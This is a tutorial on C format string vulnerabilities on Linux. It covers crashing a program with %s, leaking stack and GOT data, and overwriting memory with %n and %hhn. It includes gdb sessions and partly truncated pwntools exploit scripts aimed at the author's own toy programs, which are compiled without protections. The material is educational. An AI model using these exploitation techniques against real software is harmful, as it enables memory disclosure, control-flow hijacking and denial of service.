The format string in many programming languages, refers to a control parameter used by a class of functions. It helps to output text in specific format, according to conversion specification or format specifiers that user set.
Here we discuss it on Linux
.
Format String Introduction
For C
format string functions, characters are usually copied literally into the function’s output, but format specifiers, which start with a %
character, indicate the location and method to translate a piece of data (such as a number) to characters.
We take printf
as an example.
Format string functions include:
method name | method function |
---|---|
scanf | scan input format string |
printf | output to stdout |
fprintf | output to FILE stream |
vprintf | output to stdout according to parameter list |
vfprintf | output to FILE stream according to parameter list |
sprintf | output to string |
snprintf | output assigned number chars to string |
vsprintf | output to string according to parameter list |
vsnprintf | output specified number chars to string according to … |
setproctitle | set argv |
syslog | output log |
err, verr, warn, vwarn, etc. | error and warning output |
Basic format is %[parameter][flags][field width][.precision][length]type
, and you can check this site for meanings of every patterns.
Things we need to focus on:
- parameter
n$
: get specific parameter in format string
- flag
- field width
- minimum width to output
- precision
- maximum width to output
- length
hh
: output a byteh
: Output a double byte
- type
d/i
: signed intu
: unsigned intx/X
: hex unsigned into
: octal unsigned ints
: string (var assigns start address)c
: characterp
: variable addressn
: number of written chars%
: just%
Vulnerability Principle
The printf
reads given characters one by one.
- If not
%
, output tostdout
. - If
%
appears, read next,- If no chars following, error report.
- If
%
appears, output%
. - If other chars show up, analyze and output according to the parameters.
If we write printf
wrongly like:
1 | printf("Color %s, Number %d, Float %4.2f"); |
Without any following parameters, printf
will get variables from the stack memory (from top of the stack to bottom).
For one thing, if it reads illegal data, the program crashes; for another thing, the output can be regarded as stack data leaking.
Format String Exploit
Vulnerability comes with incorrect usage, like no parameters given after the format specifiers.
Here is a vulnerable code sample (fmtstr.c):
1 |
|
And the instruction to compile (we start from 32-bit, and no protection program):
1 | $ gcc -m32 -fno-stack-protector -no-pie -o fmtstr fmtstr.c |
There are 3 ways to exploit:
- program crashing
- memory data leaking
- memory data overwriting
Crash program
Use lots of %s
to let program read many undefined memory areas is the easist way.
This may not let you control program, but crashing remote service contributes to attacks like denial of service.
But have you ever considered, how many %s
are enough? and why?
We play with fmtstr
that is compiled above. The relationship between inputs and outputs is:
Input | Output |
---|---|
%s%s%s | %s%s%sW. |
%s%s%s%s%s | %s%s%s%s%sW.(null)(null) |
%s%s%s%s%s%s… | Segmentation fault |
USe gdb to analyze. Set a breakpoint to debug.
1 | $ gdb fmtstr -q |
Let’s look at the stack, since this vulnerability comes from no following parameters for potential format specifiers, so the format string functions will take parameters from stack.
1 | ────────────────── stack ──── |
The current top of stack is 0xffffd38c
, storing esp
. Value in 0xffffd390
is 1st parameter of printf
function, while value in 0xffffd394
is 1st parameter of format string (2nd parameter of printf
).
We use %s
to output what the values saved in stack point to (regard values in stack as string starting addresses). Let’s see what exactly do they point to.
1 | gef➤ x/x xffffd3a8 |
The above are display of 1st, 2nd, 3rd, 4th … parameter that in order.
Normally values in stack will change on different pc, and different time to run. We can see that our input is 6th parameter, however this is fixed, because this order is determined by order of program instructions.
Here we can also know how many %s
are enough to crash it. Each %s
we feed will print a item on the stack, and when the item (regarded as address) points to somewhere inaccessible, program breaks down.
As we can see, though 4th and 5th parameter are 0x00000000
which points to a definitely inaccessible place, they are translated as pointing to null. So the first parameter that causes crashing is actually 6th item. If you notice, it happens to be the input string.
So the answer is, 6 %s
is just enough (the more the better).
Leak Memory
It includes the following operations.
- Leak stack memory data
- Get variable value
- Get memory that var value (address) points to
- Leak any address data
- Use
GOT
to getlibc
addr - To dump all the program
- Use
The basic principle is using format like %n$p
or %n$x
, even %n$s
to leak data in stack memory. %p
is a better choice than %x
to print data, because %x
will print different content in 32-bit and 64-bit environments.
Leak Stack
The format string %order$p
refers to printing the number order
format string parameter. We can use %10000000$p
to leak 10000000th parameter, instead of using 10,000,000 %p
like what former section does. In theory, we can disclose whatever item on stack.
Run fmtstr
to show the effect. I feed %6$p
to leak input string.
1 | $ gdb fmtstr -q |
%p
is used to print pointers, %x
is used to print data in hex, while %s
prints what a pointer points to. so we can use it to do more creative things.
Leak Any
Now we can find our input in stack, and we have %s
to leak what a pointer points to. What if we input address to be a pointer, and use %s
to leak where it points? In theory, we can leak anywhere.
The basic exploit format is addr%order$s
. As the address is hard to input in stdin
, so I choose pwntools
to do this.
Choosing __isoc99_scanf@got
as the aim to leak is to prove the ability of leaking anywhere. The exploit script leakanywhere.py
is:
1 | from pwn import * |
The result of running it:
1 | $ python leakanywhere.py |
The address 0xf7d76a90
seems to be what scanf@got
points to (where scanf really is). It changes everytime you run the script.
Overwrite Memory
Another impressive format specifier is %n
, outputting not characters, but number of successfully printed characters. This provides us with a new method to write things to assigned place.
The basic principle of overwrite memory is using format like ...[overwrite addr]....%[overwrite offset]$n
, and the ...
means padding we need to make a certain amount for output.
We write overwrite.c
as an example to better find out what we can do:
1 |
|
Compile it (32-bit makes it easier to analyze, because 64-bit program saves first 6 args in registers on Linux).
1 | $ gcc -m32 -o overwrite overwrite.c -no-pie |
Basic
The first aim is to reach Path 1
. As ASLR
is enabled, address of variable on stack like c
changes each turn, so here I give address of c
intentionally.
Since we need to write 16
to c
, it requires address of c
that we already got, and the order of our input. The exploit will be built like: [addr][padding]%order$n
.
Determine the order
.
1 | gdb ./overwrite -q |
our input %p%p%p%p%p%p
is the 6th parameter of format string (7th parameter of func printf
), so order
should be 6
. The addr will be in received contents, so the exploit script goes like:
1 | from pwn import * |
Finally reach the Path 1
.
1 | $ python path1.py |
Here we use %012d
instead of concrete 12 letters, to show more possibilities. When running, %012d
will be replaced by 12 integers and
Advanced
Though the [addr][padding]%order$s
is enough for Path 1
, what about Path 2
and Path 3
?
For Path 2
we have to set variable a
to be 2
. If we still using format [addr][padding]%order$s
, even if [addr]
part is beyond 4 characters.
Actually it is flexible. Put [addr]
back to build aa%order$n[padding][addr]
, then determine order
, [padding]
and [addr]
.
First check the stack
1 | $ gdb ./overwrite -q |
The aa%order
occupies 6th parameter (item), the $n[padding]
should form 7th parameter so that leave [addr]
to be 8th parameter too.
Therefore order
is 8
and [padding]
should be 2 chars.
As a
is a global variable in .data
section, and we use -no-pie
to make base address static, so its address 0x00004024
is changeless. So final exploit should be: aa%8$nxx
plus 0x00004024
. Still need pwntools
:
1 | from pwn import * |
Finally reach the Path 2
.
1 | $ python path2.py |
The last challenge is Path 3
with a huge number to meet. If we also use padding, pretty much padding it is an unlikely successful exploit.
Here introduces hh
and h
, so what is the point of the h and hh modifiers for printf format specifiers?
h
: it stands for a half.
- Specifies that a following d, i, o, u, x, or X conversion specifier applies to a short int or unsigned short int argument (the argument will have been promoted according to the integer promotions, but its value shall be converted to short int or unsigned short int before printing); or that a following n conversion specifier applies to a pointer to a short int argument.
hh
: it stands for, as a historical guess, for half of a half.
- Change
short
inh
explanation tochar
.
After combining with %n
, use %hhn
to output a char size (1 bytes), use %hn
to output a short size (2 bytes). Path 3
needs b
to be 0xdeadbeef
, so we can fill the bytes one by one to form a coherent 0xdeadbeef
.
First get b
address: 0x0804C028
. Then we cover memory as follows:
1 | address hex decimal |
we still remember that the order
is 6
. Build the payload now:
1 | # since \xad < \xbe < \xde < \xef |
This is my solution, while I find another clever choice, which gives a method for all this kind of problems (similar to fmtstr_payload
in pwntools
):
1 | def fmt(prev, word, index): |
Here comes the script to reach Path 3
:
1 | from pwn import * |
And the result:
1 | $ python path3.py |